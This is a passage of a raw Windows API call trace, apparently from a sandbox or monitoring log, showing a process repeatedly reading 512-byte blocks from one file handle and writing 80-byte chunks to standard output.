WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] GetFileType (hFile=0x50) returned 0x1 [0136.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.853] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.854] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.854] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] GetFileType (hFile=0x50) returned 0x1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.854] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.854] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.855] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.855] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.855] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.855] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.856] GetFileType (hFile=0x50) returned 0x1 [0136.856] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] GetFileType (hFile=0x50) returned 0x1 [0136.857] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.857] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.857] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.857] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.857] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] GetFileType (hFile=0x50) returned 0x1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.858] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.858] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.859] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.859] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] GetFileType (hFile=0x50) returned 0x1 [0136.859] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.859] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.860] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.860] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.860] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.860] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] GetFileType (hFile=0x50) returned 0x1 [0136.861] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.861] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.862] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.862] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] GetFileType (hFile=0x50) returned 0x1 [0136.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.862] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.863] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.863] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.864] GetFileType (hFile=0x50) returned 0x1 [0136.864] 